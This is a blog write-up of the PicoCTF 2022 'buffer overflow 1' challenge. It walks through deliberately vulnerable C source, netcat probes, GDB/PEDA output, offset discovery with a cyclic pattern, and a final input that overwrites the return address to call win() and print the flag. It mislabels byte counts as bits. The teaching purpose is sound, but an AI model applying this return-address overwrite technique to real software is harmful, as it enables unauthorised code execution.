<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/assets/css/style.css?v=33cf73e227231c49003c98c0b29fb04af2660c69">
    <link rel="shortcut icon" type="image/png" href="http://0.0.0.0:4000/assets/images/shinris3n.png">

<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>buffer overflow 1 | 当て身 Atemi</title>
<meta name="generator" content="Jekyll v3.9.0" />
<meta property="og:title" content="buffer overflow 1" />
<meta name="author" content="shinris3n" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Challenge Text:" />
<meta property="og:description" content="Challenge Text:" />
<link rel="canonical" href="http://0.0.0.0:4000/writeups/2022/03/31/PicoCTF2022-buf1.html" />
<meta property="og:url" content="http://0.0.0.0:4000/writeups/2022/03/31/PicoCTF2022-buf1.html" />
<meta property="og:site_name" content="当て身 Atemi" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-03-31T21:31:21-05:00" />
<script type="application/ld+json">
{"author":{"@type":"Person","name":"shinris3n"},"url":"http://0.0.0.0:4000/writeups/2022/03/31/PicoCTF2022-buf1.html","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/writeups/2022/03/31/PicoCTF2022-buf1.html"},"description":"Challenge Text:","@type":"BlogPosting","headline":"buffer overflow 1","dateModified":"2022-03-31T21:31:21-05:00","datePublished":"2022-03-31T21:31:21-05:00","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  </head>

  <body>

    <header>
      <div class="container">
        <h1><a href = '/' style = "text-decoration:none;color:#b5e853;" >当て身 Atemi</a></h1>
        <h2>A Cybersecurity blog by shinris3n <br> 👊 <a href = "/writeups">Writeups</a> 👊 <a href = "/news">News</a> 👊 <a href = "/resources">Resources</a> <br></h2>
        <h5>Part of the <a href="https://www.ninpwn.com" target="_blank">Ninpwn</a> Network</h5>
      </div>
    </header>

    <div class="container">
      <a href="http://0.0.0.0:4000"><img src="http://0.0.0.0:4000/assets/images/shinris3n_banner_transparent.png" width="25%" height="25%" alt="shinris3n" title="shinris3n home page link"></a>
      <section id="main_content">
        <h5><a href="#" onclick="history.go(-1)"> &lt;&lt; back </a></h5><br>


<small>31 March 2022</small>
<h1>buffer overflow 1</h1>




 <small><font color="b5e853">Challenge Source: <em>PicoCTF2022</em></font></small>

<br>

  <small><font color="b5e853">Challenge Category: <em>Binary Exploitation</em></font></small>


<h1></h1>
<h3><font color="FF3030"> Challenge Text: </font></h3>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Author: Sanjay C / Palash Oswal

Control the return address. Now we're cooking! You can overflow the buffer and return to the flag function in the program. You can view source here. And connect with it using nc saturn.picoctf.net 59737
</span></code></pre></div></div>
<h3><font color="FF3030"> Solution: </font></h3>

<ul>
  <li>We are provided with the following source code and the associated, compiled executable:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;
#include "asm.h"
</span><span class="err">​</span>
<span class="cp">#define BUFSIZE 32
#define FLAGSIZE 64
</span><span class="err">​</span>
<span class="kt">void</span> <span class="nf">win</span><span class="p">()</span> <span class="p">{</span>
  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">FLAGSIZE</span><span class="p">];</span>
  <span class="kt">FILE</span> <span class="o">*</span><span class="n">f</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"flag.txt"</span><span class="p">,</span><span class="s">"r"</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">f</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"%s %s"</span><span class="p">,</span> <span class="s">"Please create 'flag.txt' in this directory with your"</span><span class="p">,</span>
                    <span class="s">"own debugging flag.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
  <span class="p">}</span>
<span class="err">​</span>
  <span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="n">FLAGSIZE</span><span class="p">,</span><span class="n">f</span><span class="p">);</span>
  <span class="n">printf</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
<span class="p">}</span>
<span class="err">​</span>
<span class="kt">void</span> <span class="nf">vuln</span><span class="p">(){</span>
  <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">BUFSIZE</span><span class="p">];</span>
  <span class="n">gets</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span>
<span class="err">​</span>
  <span class="n">printf</span><span class="p">(</span><span class="s">"Okay, time to return... Fingers Crossed... Jumping to 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">get_return_address</span><span class="p">());</span>
<span class="p">}</span>
<span class="err">​</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">){</span>
<span class="err">​</span>
  <span class="n">setvbuf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">_IONBF</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
  
  <span class="n">gid_t</span> <span class="n">gid</span> <span class="o">=</span> <span class="n">getegid</span><span class="p">();</span>
  <span class="n">setresgid</span><span class="p">(</span><span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">,</span> <span class="n">gid</span><span class="p">);</span>
<span class="err">​</span>
  <span class="n">puts</span><span class="p">(</span><span class="s">"Please enter your string: "</span><span class="p">);</span>
  <span class="n">vuln</span><span class="p">();</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>
    <p>Looking at the code, we see that the program takes an unbounded input of which it has only allocated 32 bits for and consequently is vulnerable to a buffer overflow attack.   The developer was kind to us by providing feedback with respect to the return address value and so we’ll know when/how we’ve overwritten it while troubleshooting our exploit code.  Typically this won’t be the case, so we’ll use GDB to help us determine these details when we get to that step.</p>
  </li>
  <li>
    <p>The goal will be to change the flow of the program by overwriting the return address here with the address of the “win()” function.  The win() function will print the value of the flag that we are looking for.</p>
  </li>
  <li>
    <p>We’re given an instanced service that we can connect to via netcat and find that when we enter strings we get the same return address each time (0x804932f):</p>
  </li>
</ul>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──(shinris3n㉿kodachi)-[~/sec/CTFs/PicoCTF2022/buffer overflow 1]
└─$ nc saturn.picoctf.net 59737
Please enter your string: 
test
Okay, time to return... Fingers Crossed... Jumping to 0x804932f

┌──(shinris3n㉿kodachi)-[~/sec/CTFs/PicoCTF2022/buffer overflow 1]
└─$ nc saturn.picoctf.net 59737                                                                               
Please enter your string: 
tes2
Okay, time to return... Fingers Crossed... Jumping to 0x804932f

</code></pre></div></div>
<p>Setting up a local environment to test the program and develop our exploit:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>┌──(shinris3n㉿kodachi)-[~/sec/CTFs/PicoCTF2022/buffer overflow 1]
└─$ ls
exploit.py  flag.txt  vuln  vuln.c

┌──(shinris3n㉿kodachi)-[~/sec/CTFs/PicoCTF2022/buffer overflow 1]
└─$ cat flag.txt
picoCTF{test_flag}

┌──(shinris3n㉿kodachi)-[~/sec/CTFs/PicoCTF2022/buffer overflow 1]
└─$ ./vuln
Please enter your string: 
test3
Okay, time to return... Fingers Crossed... Jumping to 0x804932f
</code></pre></div></div>

<ul>
  <li>We find by running the executable locally that the return address is identical so ASLR is conveniently off and we can focus on finding the specific address of the win() function.  We can use GDB to figure this out.  <a href="https://github.com/longld/peda" target="_blank">PEDA - Python Exploit Development Assistance for GDB</a> is being used here on top of GDB.  While isn’t really needed for a basic challenge like this one, it can be extremely helpful in general and is highly recommended.  Running GDB and looking through the functions:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">┌──</span><span class="p">(</span><span class="n">shinris3n</span><span class="err">㉿</span><span class="n">kodachi</span><span class="p">)</span><span class="o">-</span><span class="p">[</span><span class="o">~/</span><span class="n">sec</span><span class="o">/</span><span class="n">CTFs</span><span class="o">/</span><span class="n">PicoCTF2022</span><span class="o">/</span><span class="n">buffer</span> <span class="n">overflow</span> <span class="mi">1</span><span class="p">]</span>
<span class="err">└─$</span> <span class="n">gdb</span> <span class="n">vuln</span>
<span class="n">GNU</span> <span class="n">gdb</span> <span class="p">(</span><span class="n">Debian</span> <span class="mi">10</span><span class="p">.</span><span class="mi">1</span><span class="o">-</span><span class="mi">2</span><span class="p">)</span> <span class="mi">10</span><span class="p">.</span><span class="mi">1</span><span class="p">.</span><span class="mi">90</span><span class="p">.</span><span class="mi">20210103</span><span class="o">-</span><span class="n">git</span>
<span class="n">Copyright</span> <span class="p">(</span><span class="n">C</span><span class="p">)</span> <span class="mi">2021</span> <span class="n">Free</span> <span class="n">Software</span> <span class="n">Foundation</span><span class="p">,</span> <span class="n">Inc</span><span class="p">.</span>
<span class="n">License</span> <span class="n">GPLv3</span><span class="o">+:</span> <span class="n">GNU</span> <span class="n">GPL</span> <span class="n">version</span> <span class="mi">3</span> <span class="n">or</span> <span class="n">later</span> <span class="o">&lt;</span><span class="n">http</span><span class="o">:</span><span class="c1">//gnu.org/licenses/gpl.html&gt;</span>
<span class="n">This</span> <span class="n">is</span> <span class="n">free</span> <span class="n">software</span><span class="o">:</span> <span class="n">you</span> <span class="n">are</span> <span class="n">free</span> <span class="n">to</span> <span class="n">change</span> <span class="n">and</span> <span class="n">redistribute</span> <span class="n">it</span><span class="p">.</span>
<span class="n">There</span> <span class="n">is</span> <span class="n">NO</span> <span class="n">WARRANTY</span><span class="p">,</span> <span class="n">to</span> <span class="n">the</span> <span class="n">extent</span> <span class="n">permitted</span> <span class="n">by</span> <span class="n">law</span><span class="p">.</span>
<span class="n">Type</span> <span class="s">"show copying"</span> <span class="n">and</span> <span class="s">"show warranty"</span> <span class="k">for</span> <span class="n">details</span><span class="p">.</span>
<span class="n">This</span> <span class="n">GDB</span> <span class="n">was</span> <span class="n">configured</span> <span class="n">as</span> <span class="s">"x86_64-linux-gnu"</span><span class="p">.</span>
<span class="n">Type</span> <span class="s">"show configuration"</span> <span class="k">for</span> <span class="n">configuration</span> <span class="n">details</span><span class="p">.</span>
<span class="n">For</span> <span class="n">bug</span> <span class="n">reporting</span> <span class="n">instructions</span><span class="p">,</span> <span class="n">please</span> <span class="n">see</span><span class="o">:</span>
<span class="o">&lt;</span><span class="n">https</span><span class="o">:</span><span class="c1">//www.gnu.org/software/gdb/bugs/&gt;.</span>
<span class="n">Find</span> <span class="n">the</span> <span class="n">GDB</span> <span class="n">manual</span> <span class="n">and</span> <span class="n">other</span> <span class="n">documentation</span> <span class="n">resources</span> <span class="n">online</span> <span class="n">at</span><span class="o">:</span>
    <span class="o">&lt;</span><span class="n">http</span><span class="o">:</span><span class="c1">//www.gnu.org/software/gdb/documentation/&gt;.</span>

<span class="n">For</span> <span class="n">help</span><span class="p">,</span> <span class="n">type</span> <span class="s">"help"</span><span class="p">.</span>
<span class="n">Type</span> <span class="s">"apropos word"</span> <span class="n">to</span> <span class="n">search</span> <span class="k">for</span> <span class="n">commands</span> <span class="n">related</span> <span class="n">to</span> <span class="s">"word"</span><span class="p">...</span>
<span class="n">Reading</span> <span class="n">symbols</span> <span class="n">from</span> <span class="n">vuln</span><span class="p">...</span>
<span class="p">(</span><span class="n">No</span> <span class="n">debugging</span> <span class="n">symbols</span> <span class="n">found</span> <span class="n">in</span> <span class="n">vuln</span><span class="p">)</span>
<span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="err">$</span> <span class="n">info</span> <span class="n">functions</span>
<span class="n">All</span> <span class="n">defined</span> <span class="n">functions</span><span class="o">:</span>

<span class="n">Non</span><span class="o">-</span><span class="n">debugging</span> <span class="n">symbols</span><span class="o">:</span>
<span class="mh">0x08049000</span>  <span class="n">_init</span>
<span class="mh">0x08049040</span>  <span class="n">printf</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x08049050</span>  <span class="n">gets</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x08049060</span>  <span class="n">fgets</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x08049070</span>  <span class="n">getegid</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x08049080</span>  <span class="n">puts</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x08049090</span>  <span class="n">exit</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x080490a0</span>  <span class="n">__libc_start_main</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x080490b0</span>  <span class="n">setvbuf</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x080490c0</span>  <span class="n">fopen</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x080490d0</span>  <span class="n">setresgid</span><span class="err">@</span><span class="n">plt</span>
<span class="mh">0x080490e0</span>  <span class="n">_start</span>
<span class="mh">0x08049120</span>  <span class="n">_dl_relocate_static_pie</span>
<span class="mh">0x08049130</span>  <span class="n">__x86</span><span class="p">.</span><span class="n">get_pc_thunk</span><span class="p">.</span><span class="n">bx</span>
<span class="mh">0x08049140</span>  <span class="n">deregister_tm_clones</span>
<span class="mh">0x08049180</span>  <span class="n">register_tm_clones</span>
<span class="mh">0x080491c0</span>  <span class="n">__do_global_dtors_aux</span>
<span class="mh">0x080491f0</span>  <span class="n">frame_dummy</span>
<span class="mh">0x080491f6</span>  <span class="n">win</span>
<span class="mh">0x08049281</span>  <span class="n">vuln</span>
<span class="mh">0x080492c4</span>  <span class="n">main</span>
<span class="mh">0x0804933e</span>  <span class="n">get_return_address</span>
<span class="mh">0x08049350</span>  <span class="n">__libc_csu_init</span>
<span class="mh">0x080493c0</span>  <span class="n">__libc_csu_fini</span>
<span class="mh">0x080493c5</span>  <span class="n">__x86</span><span class="p">.</span><span class="n">get_pc_thunk</span><span class="p">.</span><span class="n">bp</span>
<span class="mh">0x080493cc</span>  <span class="n">_fini</span>
</code></pre></div></div>

<ul>
  <li>We can see that the address we want to actually go to is <code class="language-plaintext highlighter-rouge">0x080491f6  win</code>, and so our goal is to overwrite the return address with this one.  Since we have the source code and know the buffer length we can probably jump right into exploiting the service over netcat and working our way up from 32 characters, but to approach this in a way that works more generally (i.e. when we don’t get direct information about the address space from the program itself) we can continue to use GDB and generate a long string via metasploit’s pattern-create or this handy <a href="https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html" target="_blank">online tool</a>.</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="err">$</span> <span class="n">run</span>
<span class="n">Starting</span> <span class="n">program</span><span class="o">:</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">shinris3n</span><span class="o">/</span><span class="n">sec</span><span class="o">/</span><span class="n">CTFs</span><span class="o">/</span><span class="n">PicoCTF2022</span><span class="o">/</span><span class="n">buffer</span> <span class="n">overflow</span> <span class="mi">1</span><span class="o">/</span><span class="n">vuln</span> 
<span class="n">Please</span> <span class="n">enter</span> <span class="n">your</span> <span class="n">string</span><span class="o">:</span> 
<span class="n">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A</span>
<span class="n">Okay</span><span class="p">,</span> <span class="n">time</span> <span class="n">to</span> <span class="k">return</span><span class="p">...</span> <span class="n">Fingers</span> <span class="n">Crossed</span><span class="p">...</span> <span class="n">Jumping</span> <span class="n">to</span> <span class="mh">0x35624134</span>

<span class="n">Program</span> <span class="n">received</span> <span class="n">signal</span> <span class="n">SIGSEGV</span><span class="p">,</span> <span class="n">Segmentation</span> <span class="n">fault</span><span class="p">.</span>
<span class="p">[</span><span class="o">----------------------------------</span><span class="n">registers</span><span class="o">-----------------------------------</span><span class="p">]</span>
<span class="n">EAX</span><span class="o">:</span> <span class="mh">0x41</span> <span class="p">(</span><span class="sc">'A'</span><span class="p">)</span>
<span class="n">EBX</span><span class="o">:</span> <span class="mh">0x41326241</span> <span class="p">(</span><span class="err">'</span><span class="n">Ab2A</span><span class="err">'</span><span class="p">)</span>
<span class="n">ECX</span><span class="o">:</span> <span class="mh">0x41</span> <span class="p">(</span><span class="sc">'A'</span><span class="p">)</span>
<span class="n">EDX</span><span class="o">:</span> <span class="mh">0xffffffff</span> 
<span class="n">ESI</span><span class="o">:</span> <span class="mh">0x1</span> 
<span class="n">EDI</span><span class="o">:</span> <span class="mh">0x80490e0</span> <span class="p">(</span><span class="o">&lt;</span><span class="n">_start</span><span class="o">&gt;:</span>       <span class="n">endbr32</span><span class="p">)</span>
<span class="n">EBP</span><span class="o">:</span> <span class="mh">0x62413362</span> <span class="p">(</span><span class="err">'</span><span class="n">b3Ab</span><span class="err">'</span><span class="p">)</span>
<span class="n">ESP</span><span class="o">:</span> <span class="mh">0xffffd0b0</span> <span class="p">(</span><span class="s">"Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="n">EIP</span><span class="o">:</span> <span class="mh">0x35624134</span> <span class="p">(</span><span class="err">'</span><span class="mi">4</span><span class="n">Ab5</span><span class="err">'</span><span class="p">)</span>
<span class="n">EFLAGS</span><span class="o">:</span> <span class="mh">0x10282</span> <span class="p">(</span><span class="n">carry</span> <span class="n">parity</span> <span class="n">adjust</span> <span class="n">zero</span> <span class="n">SIGN</span> <span class="n">trap</span> <span class="n">INTERRUPT</span> <span class="n">direction</span> <span class="n">overflow</span><span class="p">)</span>
<span class="p">[</span><span class="o">-------------------------------------</span><span class="n">code</span><span class="o">-------------------------------------</span><span class="p">]</span>
<span class="n">Invalid</span> <span class="err">$</span><span class="n">PC</span> <span class="n">address</span><span class="o">:</span> <span class="mh">0x35624134</span>
<span class="p">[</span><span class="o">------------------------------------</span><span class="n">stack</span><span class="o">-------------------------------------</span><span class="p">]</span>
<span class="mo">0000</span><span class="o">|</span> <span class="mh">0xffffd0b0</span> <span class="p">(</span><span class="s">"Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">0004</span><span class="o">|</span> <span class="mh">0xffffd0b4</span> <span class="p">(</span><span class="s">"b7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">000</span><span class="mi">8</span><span class="o">|</span> <span class="mh">0xffffd0b8</span> <span class="p">(</span><span class="s">"8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">0012</span><span class="o">|</span> <span class="mh">0xffffd0bc</span> <span class="p">(</span><span class="s">"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">0016</span><span class="o">|</span> <span class="mh">0xffffd0c0</span> <span class="p">(</span><span class="s">"c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">0020</span><span class="o">|</span> <span class="mh">0xffffd0c4</span> <span class="p">(</span><span class="s">"2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">0024</span><span class="o">|</span> <span class="mh">0xffffd0c8</span> <span class="p">(</span><span class="s">"Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="mo">002</span><span class="mi">8</span><span class="o">|</span> <span class="mh">0xffffd0cc</span> <span class="p">(</span><span class="s">"c5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"</span><span class="p">)</span>
<span class="p">[</span><span class="o">------------------------------------------------------------------------------</span><span class="p">]</span>
<span class="n">Legend</span><span class="o">:</span> <span class="n">code</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">rodata</span><span class="p">,</span> <span class="n">value</span>
<span class="n">Stopped</span> <span class="n">reason</span><span class="o">:</span> <span class="n">SIGSEGV</span>
<span class="mh">0x35624134</span> <span class="n">in</span> <span class="o">??</span> <span class="p">()</span>
</code></pre></div></div>

<ul>
  <li>When the program crashes, we can see the return address (the value of the EIP register) was overwritten with “4Ab5”.  Using the online tool we see the offset is 44 bits.</li>
</ul>

<p><img src="/assets/writeups/PicoCTF2022/patternoffset.png" alt="patternoffset.png" /></p>

<ul>
  <li>So now, we can create a string of 44 bits and then control the value of EIP with the following 4 bits.  Trying this with a pattern of length 44 and then our own string (<code class="language-plaintext highlighter-rouge">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3AbHELO</code>), then running again:</li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="err">$</span> <span class="n">run</span>
<span class="n">Starting</span> <span class="n">program</span><span class="o">:</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">shinris3n</span><span class="o">/</span><span class="n">sec</span><span class="o">/</span><span class="n">CTFs</span><span class="o">/</span><span class="n">PicoCTF2022</span><span class="o">/</span><span class="n">buffer</span> <span class="n">overflow</span> <span class="mi">1</span><span class="o">/</span><span class="n">vuln</span> 
<span class="n">Please</span> <span class="n">enter</span> <span class="n">your</span> <span class="n">string</span><span class="o">:</span> 
<span class="n">Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3AbHELO</span>
<span class="n">Okay</span><span class="p">,</span> <span class="n">time</span> <span class="n">to</span> <span class="k">return</span><span class="p">...</span> <span class="n">Fingers</span> <span class="n">Crossed</span><span class="p">...</span> <span class="n">Jumping</span> <span class="n">to</span> <span class="mh">0x4f4c4548</span>

<span class="n">Program</span> <span class="n">received</span> <span class="n">signal</span> <span class="n">SIGSEGV</span><span class="p">,</span> <span class="n">Segmentation</span> <span class="n">fault</span><span class="p">.</span>
<span class="p">[</span><span class="o">----------------------------------</span><span class="n">registers</span><span class="o">-----------------------------------</span><span class="p">]</span>
<span class="n">EAX</span><span class="o">:</span> <span class="mh">0x41</span> <span class="p">(</span><span class="sc">'A'</span><span class="p">)</span>
<span class="n">EBX</span><span class="o">:</span> <span class="mh">0x41326241</span> <span class="p">(</span><span class="err">'</span><span class="n">Ab2A</span><span class="err">'</span><span class="p">)</span>
<span class="n">ECX</span><span class="o">:</span> <span class="mh">0x41</span> <span class="p">(</span><span class="sc">'A'</span><span class="p">)</span>
<span class="n">EDX</span><span class="o">:</span> <span class="mh">0xffffffff</span> 
<span class="n">ESI</span><span class="o">:</span> <span class="mh">0x1</span> 
<span class="n">EDI</span><span class="o">:</span> <span class="mh">0x80490e0</span> <span class="p">(</span><span class="o">&lt;</span><span class="n">_start</span><span class="o">&gt;:</span>       <span class="n">endbr32</span><span class="p">)</span>
<span class="n">EBP</span><span class="o">:</span> <span class="mh">0x62413362</span> <span class="p">(</span><span class="err">'</span><span class="n">b3Ab</span><span class="err">'</span><span class="p">)</span>
<span class="n">ESP</span><span class="o">:</span> <span class="mh">0xffffd0b0</span> <span class="o">--&gt;</span> <span class="mh">0x0</span> 
<span class="n">EIP</span><span class="o">:</span> <span class="mh">0x4f4c4548</span> <span class="p">(</span><span class="err">'</span><span class="n">HELO</span><span class="err">'</span><span class="p">)</span>
<span class="n">EFLAGS</span><span class="o">:</span> <span class="mh">0x10282</span> <span class="p">(</span><span class="n">carry</span> <span class="n">parity</span> <span class="n">adjust</span> <span class="n">zero</span> <span class="n">SIGN</span> <span class="n">trap</span> <span class="n">INTERRUPT</span> <span class="n">direction</span> <span class="n">overflow</span><span class="p">)</span>
<span class="p">[</span><span class="o">-------------------------------------</span><span class="n">code</span><span class="o">-------------------------------------</span><span class="p">]</span>
<span class="n">Invalid</span> <span class="err">$</span><span class="n">PC</span> <span class="n">address</span><span class="o">:</span> <span class="mh">0x4f4c4548</span>
<span class="p">[</span><span class="o">------------------------------------</span><span class="n">stack</span><span class="o">-------------------------------------</span><span class="p">]</span>
<span class="mo">0000</span><span class="o">|</span> <span class="mh">0xffffd0b0</span> <span class="o">--&gt;</span> <span class="mh">0x0</span> 
<span class="mo">0004</span><span class="o">|</span> <span class="mh">0xffffd0b4</span> <span class="o">--&gt;</span> <span class="mh">0xffffd184</span> <span class="o">--&gt;</span> <span class="mh">0xffffd334</span> <span class="p">(</span><span class="s">"/home/shinris3n/sec/CTFs/PicoCTF2022/buffer overflow 1/vuln"</span><span class="p">)</span>
<span class="mo">000</span><span class="mi">8</span><span class="o">|</span> <span class="mh">0xffffd0b8</span> <span class="o">--&gt;</span> <span class="mh">0xffffd18c</span> <span class="o">--&gt;</span> <span class="mh">0xffffd370</span> <span class="p">(</span><span class="s">"SHELL=/bin/bash"</span><span class="p">)</span>
<span class="mo">0012</span><span class="o">|</span> <span class="mh">0xffffd0bc</span> <span class="o">--&gt;</span> <span class="mh">0x3e9</span> 
<span class="mo">0016</span><span class="o">|</span> <span class="mh">0xffffd0c0</span> <span class="o">--&gt;</span> <span class="mh">0xffffd0e0</span> <span class="o">--&gt;</span> <span class="mh">0x1</span> 
<span class="mo">0020</span><span class="o">|</span> <span class="mh">0xffffd0c4</span> <span class="o">--&gt;</span> <span class="mh">0x0</span> 
<span class="mo">0024</span><span class="o">|</span> <span class="mh">0xffffd0c8</span> <span class="o">--&gt;</span> <span class="mh">0x0</span> 
<span class="mo">002</span><span class="mi">8</span><span class="o">|</span> <span class="mh">0xffffd0cc</span> <span class="o">--&gt;</span> <span class="mh">0xf7ddb905</span> <span class="p">(</span><span class="o">&lt;</span><span class="n">__libc_start_main</span><span class="o">+</span><span class="mi">229</span><span class="o">&gt;:</span>       <span class="n">add</span>    <span class="n">esp</span><span class="p">,</span><span class="mh">0x10</span><span class="p">)</span>
<span class="p">[</span><span class="o">------------------------------------------------------------------------------</span><span class="p">]</span>
<span class="n">Legend</span><span class="o">:</span> <span class="n">code</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">rodata</span><span class="p">,</span> <span class="n">value</span>
<span class="n">Stopped</span> <span class="n">reason</span><span class="o">:</span> <span class="n">SIGSEGV</span>
<span class="mh">0x4f4c4548</span> <span class="n">in</span> <span class="o">??</span> <span class="p">()</span>
</code></pre></div></div>

<ul>
  <li>Now we need to substitute in the address of the win() function, so we’ll need to change the way we’re interacting with the program a bit and pipe our string so we can send the bytecode across.  For example: <code class="language-plaintext highlighter-rouge">gdb-peda$ run &lt; &lt;(echo -ne "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3AbHELO")</code> gives the same results as the above.  Now we can change the last 4 bits to the win() address we found earlier (0x080491f6), in little endian format.  Our full input to GDB becomes:  <code class="language-plaintext highlighter-rouge">run &lt; &lt;(echo -ne "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab\xf6\x91\x04\x08"</code></li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">gdb</span><span class="o">-</span><span class="n">peda</span><span class="err">$</span> <span class="n">run</span> <span class="o">&lt;</span> <span class="o">&lt;</span><span class="p">(</span><span class="n">echo</span> <span class="o">-</span><span class="n">ne</span> <span class="s">"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab</span><span class="se">\xf6\x91\x04\x08</span><span class="s">"</span><span class="p">)</span>
<span class="n">Starting</span> <span class="n">program</span><span class="o">:</span> <span class="o">/</span><span class="n">home</span><span class="o">/</span><span class="n">shinris3n</span><span class="o">/</span><span class="n">sec</span><span class="o">/</span><span class="n">CTFs</span><span class="o">/</span><span class="n">PicoCTF2022</span><span class="o">/</span><span class="n">buffer</span> <span class="n">overflow</span> <span class="mi">1</span><span class="o">/</span><span class="n">vuln</span> <span class="o">&lt;</span> <span class="o">&lt;</span><span class="p">(</span><span class="n">echo</span> <span class="o">-</span><span class="n">ne</span> <span class="s">"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab</span><span class="se">\xf6\x91\x04\x08</span><span class="s">"</span><span class="p">)</span>
<span class="n">Please</span> <span class="n">enter</span> <span class="n">your</span> <span class="n">string</span><span class="o">:</span> 
<span class="n">Okay</span><span class="p">,</span> <span class="n">time</span> <span class="n">to</span> <span class="k">return</span><span class="p">...</span> <span class="n">Fingers</span> <span class="n">Crossed</span><span class="p">...</span> <span class="n">Jumping</span> <span class="n">to</span> <span class="mh">0x80491f6</span>
<span class="n">picoCTF</span><span class="p">{</span><span class="n">test_flag</span><span class="p">}</span>

